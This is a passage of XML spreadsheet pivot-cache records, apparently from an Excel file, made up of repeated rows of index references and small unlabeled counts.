    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="3"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="5"/>
    <x v="1106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="13"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="77"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="22"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="105"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="113"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="153"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="80"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="100"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="38"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1119"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1120"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="21"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1121"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1122"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="20"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="30"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1123"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="50"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="25"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="22"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="159"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1124"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="15"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1125"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1126"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1126"/>
  </r>
  <r>
